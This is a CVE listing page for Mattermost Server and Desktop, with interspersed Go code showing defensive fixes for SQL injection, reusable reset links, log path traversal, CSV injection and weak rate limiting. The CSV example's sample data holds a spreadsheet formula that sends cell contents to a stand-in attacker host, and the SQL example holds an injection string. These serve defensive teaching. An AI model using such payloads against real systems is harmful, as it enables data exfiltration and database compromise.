Vulnerabilities (CVE)


Filtered by vendor: Mattermost
Total 194 CVE
CVE    Vendors (count, name)    Products (count, name)    Updated    CVSS v2 (score, severity)    CVSS v3 (score, severity)
CVE-2017-18882 1 Mattermost 1 Mattermost Server 2020-06-26 4.3 MEDIUM 6.1 MEDIUM
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. XSS can occur via OpenGraph data.
CVE-2019-20863 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 7.5 HIGH
An issue was discovered in Mattermost Server before 5.13.0. Incoming webhook creation is not properly restricted.
CVE-2017-18881 1 Mattermost 1 Mattermost Server 2020-06-26 4.3 MEDIUM 6.1 MEDIUM
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. XSS could occur via a goto_location response to a slash command.
CVE-2017-18887 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. It discloses the team creator's e-mail address to members.
CVE-2017-18888 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. It allows SQL injection during the fetching of multiple posts.
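CVE-2017-18888 is SQL injection while fetching several posts at once. The advisory gives no detail of the affected query, so the Go snippet below is an added, generic illustration of the pattern behind most multi-ID injections (an IN list assembled by string concatenation) next to the parameterised form; it is not Mattermost's code, and the table, column, helper names and the cap of 200 IDs are assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// UnsafePostsByIDs is the pattern to avoid: the identifiers are spliced into
// the statement text, so an ID containing a quote rewrites the query.
func UnsafePostsByIDs(ids []string) string {
	quoted := make([]string, len(ids))
	for i, id := range ids {
		quoted[i] = "'" + id + "'"
	}
	return "SELECT * FROM Posts WHERE Id IN (" + strings.Join(quoted, ",") + ")"
}

var ErrTooManyIDs = errors.New("too many post ids in one query")

// maxIDsPerQuery is an assumed bound; pick one that fits your driver's
// parameter limit.
const maxIDsPerQuery = 200

// PostsByIDsQuery builds the same statement with one placeholder per ID and
// returns the IDs as bind arguments, so the driver never parses them as SQL.
// An empty list short-circuits instead of producing the invalid "IN ()", and
// the list is bounded so a caller cannot hand the database a huge statement.
func PostsByIDsQuery(ids []string) (query string, args []interface{}, err error) {
	if len(ids) == 0 {
		return "", nil, nil
	}
	if len(ids) > maxIDsPerQuery {
		return "", nil, ErrTooManyIDs
	}
	placeholders := strings.TrimSuffix(strings.Repeat("?,", len(ids)), ",")
	args = make([]interface{}, len(ids))
	for i, id := range ids {
		args[i] = id
	}
	return "SELECT * FROM Posts WHERE Id IN (" + placeholders + ")", args, nil
}

func main() {
	// Constructed input: a legitimate ID and an injection attempt.
	q, args, _ := PostsByIDsQuery([]string{"p1", "x') OR ('1'='1"})
	fmt.Println(q, args) // execute as db.Query(q, args...) against a *sql.DB
}
```

Run the returned query with `db.Query(q, args...)`; the placeholder syntax shown is `?`, which MySQL and SQLite drivers use, while PostgreSQL needs `$1, $2, ...`.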
CVE-2019-20861 1 Mattermost 1 Mattermost Desktop 2020-06-26 6.8 MEDIUM 8.8 HIGH
An issue was discovered in Mattermost Desktop App before 4.2.2. It allows attackers to execute arbitrary code via a crafted link.
CVE-2017-18897 1 Mattermost 1 Mattermost Server 2020-06-26 5.8 MEDIUM 6.1 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5, when used as an OAuth 2.0 service provider. It mishandles a deny action for a redirection.
CVE-2017-18898 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5. It allows crafted posts that potentially cause a web browser to hang.
CVE-2017-18871 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 7.5 HIGH
An issue was discovered in Mattermost Server before 4.5.0, 4.4.5, 4.3.4, and 4.2.2. It allows attackers to cause a denial of service (application crash) via an @ character before a JavaScript field name.
CVE-2016-11064 1 Mattermost 1 Mattermost Desktop 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Desktop App before 3.4.0. Strings could be executed as code via injection.
CVE-2016-11069 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 7.5 HIGH
An issue was discovered in Mattermost Server before 3.2.0. It mishandles brute-force attempts at password change.
CVE-2016-11065 1 Mattermost 1 Mattermost Server 2020-06-26 4.0 MEDIUM 4.3 MEDIUM
An issue was discovered in Mattermost Server before 3.3.0. An attacker could use the WebSocket feature to send pop-up messages to users or change a post's appearance.
CVE-2016-11062 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 3.5.1. E-mail address verification can be bypassed.
CVE-2016-11072 1 Mattermost 1 Mattermost Server 2020-06-26 6.4 MEDIUM 6.5 MEDIUM
An issue was discovered in Mattermost Server before 3.0.2. The purposes of a session ID and a Session Token were mishandled.
CVE-2016-11074 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 3.0.0. A password-reset link could be reused.
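CVE-2016-11074 is a password-reset link that stays valid after it has been used. The Go snippet below is an added example of how a reset-token store is usually hardened, not Mattermost's code: tokens are random, stored only as a hash, expire, are revoked when a newer one is issued, and are consumed atomically on first use. The type and function names and the one-hour lifetime are assumptions made for this example.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"sync"
	"time"
)

var ErrInvalidToken = errors.New("reset token is invalid, expired or already used")

type resetRecord struct {
	userID    string
	expiresAt time.Time
	used      bool
}

// ResetStore issues single-use, time-limited password-reset tokens. Only the
// SHA-256 of a token is kept, so a copy of the table does not yield live
// reset links. The clock is injectable so expiry can be tested.
type ResetStore struct {
	mu      sync.Mutex
	ttl     time.Duration
	now     func() time.Time
	records map[string]*resetRecord // keyed by hex(sha256(token))
}

func NewResetStore(ttl time.Duration, now func() time.Time) *ResetStore {
	return &ResetStore{ttl: ttl, now: now, records: map[string]*resetRecord{}}
}

func hashToken(tok string) string {
	sum := sha256.Sum256([]byte(tok))
	return hex.EncodeToString(sum[:])
}

// Issue mints a 256-bit random token for userID. Any earlier, still-unused
// token for the same user is revoked, so only the newest link works.
func (s *ResetStore) Issue(userID string) (string, error) {
	raw := make([]byte, 32)
	if _, err := rand.Read(raw); err != nil {
		return "", err
	}
	tok := base64.RawURLEncoding.EncodeToString(raw)
	s.mu.Lock()
	defer s.mu.Unlock()
	for key, r := range s.records {
		if r.userID == userID {
			delete(s.records, key)
		}
	}
	s.records[hashToken(tok)] = &resetRecord{userID: userID, expiresAt: s.now().Add(s.ttl)}
	return tok, nil
}

// Consume validates tok and marks it used under the same lock, so two
// concurrent requests carrying the same link cannot both succeed.
func (s *ResetStore) Consume(tok string) (string, error) {
	s.mu.Lock()
	defer s.mu.Unlock()
	r, ok := s.records[hashToken(tok)]
	if !ok || r.used || s.now().After(r.expiresAt) {
		return "", ErrInvalidToken
	}
	r.used = true
	return r.userID, nil
}

func main() {
	store := NewResetStore(time.Hour, time.Now)
	tok, _ := store.Issue("user-1") // constructed user id
	_, first := store.Consume(tok)
	_, second := store.Consume(tok)
	fmt.Println("first use error:", first, "| second use error:", second)
}
```

The same error is returned for unknown, expired, superseded and already-used tokens so that a probe cannot distinguish the cases; in a real deployment the records would live in the database with the same hashed key.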
CVE-2017-18912 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 3.8.2, 3.7.5, and 3.6.7. It allows an attacker to specify a full pathname of a log file.
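CVE-2017-18912 lets an attacker choose the full pathname of a log file, which turns the logger into an arbitrary-file-write primitive. The Go snippet below is an added example of the containment check a server should apply to an operator-supplied log name, not Mattermost's code; the function name and the /var/log/app directory are assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var ErrPathOutsideLogDir = errors.New("log file path escapes the log directory")

// ResolveLogPath turns a user-supplied log file name into an absolute path
// that is guaranteed to sit under logDir. Relative sub-paths such as
// "audit/2020-06.log" are allowed; absolute paths and anything that cleans
// to a location outside logDir are rejected rather than silently fixed up.
func ResolveLogPath(logDir, name string) (string, error) {
	if name == "" || strings.IndexByte(name, 0) >= 0 {
		return "", errors.New("empty or malformed log file name")
	}
	if filepath.IsAbs(name) {
		return "", ErrPathOutsideLogDir
	}
	base, err := filepath.Abs(logDir)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so "..", "." and repeated separators collapse
	// before the containment check below.
	full := filepath.Join(base, name)
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrPathOutsideLogDir
	}
	return full, nil
}

func main() {
	// Constructed inputs: two legitimate names and three escape attempts.
	for _, name := range []string{"mattermost.log", "audit/2020-06.log", "../../etc/passwd", "/etc/passwd", "a/../../b"} {
		p, err := ResolveLogPath("/var/log/app", name)
		fmt.Printf("%-20q -> %q %v\n", name, p, err)
	}
}
```

The check is purely lexical. If the log directory can contain symlinks created by a less trusted party, also resolve the final path with filepath.EvalSymlinks, or open the file with O_NOFOLLOW, before writing.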
CVE-2017-18901 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.1.0, 4.0.4, and 3.10.3. It allows attackers to discover a team invite ID by requesting a JSON document.
CVE-2017-18900 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 4.1.0, 4.0.4, and 3.10.3. It allows CSV injection via a compliance report.
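CVE-2017-18900 is CSV injection through a compliance report: a cell that begins with =, +, -, @ (or a tab or carriage return) is evaluated as a formula when the export is opened in a spreadsheet, so a chat message can become a hyperlink or DDE payload on the auditor's machine. The Go snippet below is an added illustration of the usual hardening, not Mattermost's code; the function names, the report columns and the sample messages are constructed for this example.

```go
package main

import (
	"bytes"
	"encoding/csv"
	"fmt"
	"strings"
)

// Leading characters that spreadsheet applications treat as the start of a
// formula. Tab and carriage return are included because some importers strip
// them and then evaluate what follows.
const formulaTriggers = "=+-@\t\r"

// SanitizeCSVCell prefixes a single quote to any cell that would otherwise
// be evaluated as a formula, so it is shown as literal text. This also
// touches legitimate values such as "-5": apply it to free-text columns
// (messages, display names) and leave typed numeric columns alone.
func SanitizeCSVCell(cell string) string {
	if cell != "" && strings.ContainsRune(formulaTriggers, rune(cell[0])) {
		return "'" + cell
	}
	return cell
}

// WriteComplianceCSV renders rows with encoding/csv, sanitizing every cell.
// csv.Writer quotes embedded commas and doubles embedded quotes, which stops
// a value from closing its own cell and smuggling in a second, unsanitized one.
func WriteComplianceCSV(rows [][]string) (string, error) {
	var buf bytes.Buffer
	w := csv.NewWriter(&buf)
	for _, row := range rows {
		clean := make([]string, len(row))
		for i, cell := range row {
			clean[i] = SanitizeCSVCell(cell)
		}
		if err := w.Write(clean); err != nil {
			return "", err
		}
	}
	w.Flush()
	return buf.String(), w.Error()
}

// ParseCSV reads an export back, which is how a test can confirm that the
// neutralised value survives a round trip intact.
func ParseCSV(s string) ([][]string, error) {
	return csv.NewReader(strings.NewReader(s)).ReadAll()
}

// SampleRows is constructed data for this example: a compliance export of
// chat messages, one of which carries a spreadsheet formula payload.
func SampleRows() [][]string {
	return [][]string{
		{"Timestamp", "User", "Channel", "Message"},
		{"2020-06-26T10:00:00Z", "alice", "town-square", `=HYPERLINK("http://attacker.example/"&A1,"click me")`},
		{"2020-06-26T10:01:00Z", "bob", "town-square", "+1 sounds good"},
		{"2020-06-26T10:02:00Z", "carol", "town-square", "see @dave's note, it's fine"},
	}
}

func main() {
	out, err := WriteComplianceCSV(SampleRows())
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```

The quote prefix is visible to the reader of the report; that is the intended trade-off, since the alternative of stripping the characters silently alters evidence in a compliance export.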
CVE-2017-18899 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5. It mishandles IP-based rate limiting.
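Two entries above concern the same control: CVE-2016-11069 (brute force at password change not handled) and CVE-2017-18899 (IP-based rate limiting mishandled). The Go snippet below is an added example covering both, not Mattermost's code: the client address is taken from X-Forwarded-For only when the TCP peer is a trusted proxy, and password-change attempts are limited per source IP and per target account independently. Type and function names, the 10.0.0.0/8 proxy network and the limits of 3 and 5 attempts per minute are assumptions made for this example.

```go
package main

import (
	"fmt"
	"net"
	"strings"
	"sync"
	"time"
)

func inAny(ip net.IP, nets []*net.IPNet) bool {
	for _, n := range nets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// ClientIP picks the address to rate-limit on. X-Forwarded-For is honoured only
// when the TCP peer is a trusted proxy; otherwise a client could reset its own
// bucket on every request by forging the header. For a trusted peer the chain is
// walked right to left and the first hop that is not a trusted proxy is the client.
func ClientIP(remoteAddr, xff string, trustedProxies []*net.IPNet) string {
	host, _, err := net.SplitHostPort(remoteAddr)
	if err != nil {
		host = remoteAddr
	}
	peer := net.ParseIP(host)
	if peer == nil {
		return host
	}
	if xff == "" || !inAny(peer, trustedProxies) {
		return peer.String()
	}
	hops := strings.Split(xff, ",")
	for i := len(hops) - 1; i >= 0; i-- {
		ip := net.ParseIP(strings.TrimSpace(hops[i]))
		if ip == nil {
			return peer.String() // malformed chain: fall back to the proxy itself
		}
		if !inAny(ip, trustedProxies) {
			return ip.String()
		}
	}
	return peer.String()
}

// Limiter is a sliding-window counter: at most limit attempts per key inside
// window. The clock is injectable so the window can be tested.
type Limiter struct {
	mu     sync.Mutex
	limit  int
	window time.Duration
	now    func() time.Time
	hits   map[string][]time.Time
}

func NewLimiter(limit int, window time.Duration, now func() time.Time) *Limiter {
	return &Limiter{limit: limit, window: window, now: now, hits: map[string][]time.Time{}}
}

// Allow records an attempt for key and reports whether it is within the limit.
func (l *Limiter) Allow(key string) bool {
	l.mu.Lock()
	defer l.mu.Unlock()
	t := l.now()
	cutoff := t.Add(-l.window)
	kept := l.hits[key][:0] // in-place filter keeping only hits still inside the window
	for _, h := range l.hits[key] {
		if h.After(cutoff) {
			kept = append(kept, h)
		}
	}
	if len(kept) >= l.limit {
		l.hits[key] = kept
		return false
	}
	l.hits[key] = append(kept, t)
	return true
}

// PasswordChangeGuard applies two independent limits, per source IP and per
// target account. Both counters are always charged, so a request blocked by
// one limit still counts against the other.
type PasswordChangeGuard struct {
	byIP, byUser *Limiter
	proxies      []*net.IPNet
}

func (g *PasswordChangeGuard) Check(remoteAddr, xff, userID string) bool {
	okIP := g.byIP.Allow("ip:" + ClientIP(remoteAddr, xff, g.proxies))
	okUser := g.byUser.Allow("user:" + userID)
	return okIP && okUser
}

func main() {
	_, lan, _ := net.ParseCIDR("10.0.0.0/8") // constructed: the reverse proxy's network
	g := &PasswordChangeGuard{byIP: NewLimiter(3, time.Minute, time.Now), byUser: NewLimiter(5, time.Minute, time.Now), proxies: []*net.IPNet{lan}}
	fmt.Println("allowed:", g.Check("203.0.113.5:4444", "198.51.100.9", "alice")) // forged XFF from an untrusted peer is ignored
}
```

Rate limiting is a backstop, not a substitute for the primary control: a password change should still require the current password (or a fresh re-authentication), and a lockout or notification should fire on the account once the per-user limit trips.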
CVE-2017-18896 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5. It allows attackers to add DEBUG lines to the logs via a REST API version 3 logging endpoint.